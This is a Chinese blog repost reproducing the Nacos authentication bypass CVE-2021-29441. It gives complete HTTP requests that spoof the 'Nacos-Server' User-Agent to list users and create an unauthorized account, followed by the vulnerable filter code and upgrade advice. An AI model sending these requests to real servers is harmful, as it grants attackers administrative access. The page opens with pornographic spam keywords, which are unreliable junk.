国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

這篇具有很好參考價(jià)值的文章主要介紹了Nacos認(rèn)證繞過漏洞(CVE-2021-29441)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

指紋識(shí)別

title=nacos

漏洞范圍

nacos1.2.0版本-nacos1.4.0版本

漏洞復(fù)現(xiàn)

靶機(jī)ip:192.168.1.4

默認(rèn)的nacos登錄界面

http://192.168.1.14:8848/nacos/#/login

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

利用如下請(qǐng)求包查看只有一個(gè)nacos用戶

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.1.14:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

用如下請(qǐng)求包添加用戶

POST /nacos/v1/auth/users?username=tpaer&password=123456 HTTP/1.1
Host: 192.168.1.14:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

再次查看我們的用戶增加了tpaer用戶

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

用新用戶登錄進(jìn)行驗(yàn)證,成功未授權(quán)訪問繞過驗(yàn)證

Nacos認(rèn)證繞過漏洞(CVE-2021-29441)

漏洞原理

官方給出的文檔描述

開啟鑒權(quán)功能后,服務(wù)端之間的請(qǐng)求也會(huì)通過鑒權(quán)系統(tǒng)的影響??紤]到服務(wù)端之間的通信應(yīng)該是可信的,因此在1.2~1.4.0版本期間,通過User-Agent中是否包含Nacos-Server來進(jìn)行判斷請(qǐng)求是否來自其他服務(wù)端。

但這種實(shí)現(xiàn)由于過于簡(jiǎn)單且固定,導(dǎo)致可能存在安全問題。因此從1.4.1版本開始,Nacos添加服務(wù)身份識(shí)別功能,用戶可以自行配置服務(wù)端的Identity,不再使用User-Agent作為服務(wù)端請(qǐng)求的判斷標(biāo)準(zhǔn)。

Nacos中的Auth Filter對(duì)User-Agent請(qǐng)求頭進(jìn)行了校驗(yàn),如果為Constants.NACOS_SERVER_HEADER則直接放行,該值為"Nacos-Server"

String userAgent = WebUtils.getUserAgent(req);
        
if(StringUtils.startsWith(userAgent,Constants.NACOS_SERVER_HEADER)) {
    chain.doFilter(request, response);
    return;
}

漏洞修復(fù)

1.升級(jí)nacos版本(建議)

2.修改配置文章來源地址http://www.zghlxwxcb.cn/news/detail-468887.html

到了這里,關(guān)于Nacos認(rèn)證繞過漏洞(CVE-2021-29441)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Apache Superset 身份認(rèn)證繞過漏洞(CVE-2023-27524)

    Apache Superset是一個(gè)開源的數(shù)據(jù)可視化和數(shù)據(jù)探測(cè)平臺(tái),它基于Python構(gòu)建,使用了一些類似于Django和Flask的Python web框架。提供了一個(gè)用戶友好的界面,可以輕松地創(chuàng)建和共享儀表板、查詢和可視化數(shù)據(jù),也可以集成到其他應(yīng)用程序中。由于用戶在默認(rèn)安裝過程中,未對(duì)SECRET_KE

    2024年02月09日
    瀏覽(41)
  • CVE-2022-22978 Spring-security 認(rèn)證繞過漏洞復(fù)現(xiàn)

    CVE-2022-22978 Spring-security 認(rèn)證繞過漏洞復(fù)現(xiàn)

    目錄 0x01 聲明: 0x02 簡(jiǎn)介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: ????????Vulfocus環(huán)境搭建: ????????漏洞環(huán)境搭建: ????????打開頁面: 0x06 漏洞復(fù)現(xiàn): 0x07 流量分析: 0x08 修復(fù)建議: ????????僅供學(xué)習(xí)參考使用,請(qǐng)勿用作違法用途,否則后果自負(fù)。

    2024年02月16日
    瀏覽(29)
  • Nacos 身份認(rèn)證繞過漏洞(QVD-2023-6271)

    ? ? ? ? 最近接到安全信息部門提報(bào)Nacos?身份認(rèn)證繞過漏洞(QVD-2023-6271),評(píng)級(jí)為高位漏洞。 漏洞描述:開源服務(wù)管理平臺(tái) Nacos 中存在身份認(rèn)證繞過漏洞,在默認(rèn)配 置下未token.secret.key 進(jìn)行修改,導(dǎo)致遠(yuǎn)程攻擊者可以繞 過密鑰認(rèn)證進(jìn)入后臺(tái),造成系統(tǒng)受控等后果。 漏洞影響

    2024年02月07日
    瀏覽(26)
  • 【備忘錄】修復(fù)docker環(huán)境下的nacos安全漏洞:身份認(rèn)證繞過漏洞

    【備忘錄】修復(fù)docker環(huán)境下的nacos安全漏洞:身份認(rèn)證繞過漏洞

    報(bào)告截取內(nèi)容如下 1.1 訪問登錄口用戶名輸入nacos密碼輸入任意值,進(jìn)行抓包 1.2 偽造登錄憑證 添加有效登錄時(shí)間戳 登錄信息中 在payload中輸入nacos與時(shí)間戳 并添加入naco s默認(rèn)密鑰 SecretKey012345678901234567890123456789012345678901234567890123456789 同時(shí)選中base64加密 點(diǎn)擊生成 1.3 登錄包中新

    2024年02月01日
    瀏覽(20)
  • CVE-2021–26855與CVE-2021–27065漏洞分析及復(fù)現(xiàn)

    CVE-2021–26855與CVE-2021–27065漏洞分析及復(fù)現(xiàn)

    文章首發(fā)先知社區(qū):https://xz.aliyun.com/t/10098 微軟在上半年三月披露了關(guān)于Exchange郵件服務(wù)器 CVE-2021–26855 (SSRF)與 CVE-2021–27065 (任意文件寫入)的漏洞,這兩個(gè)漏洞配合可以造成未授權(quán)的webshell寫入,是非常嚴(yán)重的高危漏洞。漏洞剛出來那會(huì)兒并未注意,正好前兩天4哥在群里發(fā)了個(gè)關(guān)

    2024年02月07日
    瀏覽(56)
  • CVE-2021-4034漏洞原理解析

    CVE-2021-4034漏洞原理解析

    本篇文章主要敘述CVE-2021-4034漏洞,該漏洞影響的linux發(fā)行版眾多,例如:Ubuntu、CentOS、Debian等等,該漏洞為L(zhǎng)inux系統(tǒng)本地提權(quán)漏洞,利用腳本已經(jīng)公開,利用簡(jiǎn)單且穩(wěn)定,腳本地址:Github 當(dāng)攻擊者獲取目標(biāo)系統(tǒng)普通用戶權(quán)限時(shí),利用該腳本即可直接獲得root權(quán)限,該漏洞的主要

    2023年04月12日
    瀏覽(19)
  • NACOS身份認(rèn)證繞過

    NACOS身份認(rèn)證繞過

    一、漏洞描述 Nacos是Alibaba的一個(gè)動(dòng)態(tài)服務(wù)發(fā)現(xiàn)、配置和服務(wù)管理平臺(tái)。攻擊者通過添加Nacos-Server的User-Agent頭部將可繞過(nacos.core.auth.enabled=true)鑒權(quán)認(rèn)證,從而進(jìn)行API操作。 二、漏洞利用 訪問 http://xxxxx/nacos/v1/auth/users?username=testpassword=test ,并使用burpsuite進(jìn)行抓包,將方法

    2024年02月16日
    瀏覽(27)
  • 漏洞修復(fù)--OpenSSH權(quán)限提升漏洞(CVE-2021-41617)

    漏洞修復(fù)--OpenSSH權(quán)限提升漏洞(CVE-2021-41617)

    官方已發(fā)布安全版本修復(fù)漏洞,騰訊安全專家建議受影響的用戶請(qǐng)盡快更新至安全版本。 安全版本:OpenSSH 8.8 用戶可根據(jù)所使用的發(fā)行版本,升級(jí)修復(fù)。 查看OpenSSH版本:rpm -qa | grep openssh 升級(jí)OpenSSL版本:yum -y install openssh centos7 用戶,建議升級(jí)到如下版本:openssh-7.4p1-22.el7

    2024年02月15日
    瀏覽(37)
  • 漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    0x00 漏洞描述 ????????Apache Shiro 是一套用于執(zhí)行認(rèn)證、授權(quán)、加密和會(huì)話管理的 Java 安全框架。2022年06月29日 APache 官方發(fā)布了一則關(guān)于 Apache Shiro 的安全通告,Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用帶有 “.” 的正則時(shí),可能會(huì)導(dǎo)致權(quán)限繞過。漏洞源于 RegExPatter

    2024年02月02日
    瀏覽(36)
  • Weblogic漏洞 CVE-2021-2109 處理

    Weblogic漏洞 CVE-2021-2109 處理

    好記憶不如爛筆頭,能記下點(diǎn)東西,就記下點(diǎn),有時(shí)間拿出來看看,也會(huì)發(fā)覺不一樣的感受. 目錄 一、前言 二、影響版本 三、漏洞查閱 四、漏洞修復(fù) 4.1 補(bǔ)丁包下載 ?4.2 安裝補(bǔ)丁包 ?4.3 具體操作 oracl 早就發(fā)布了weblogic的漏洞信息,但是因?yàn)楦鞣N原因沒有及時(shí)處理(內(nèi)網(wǎng)環(huán)境

    2024年02月04日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包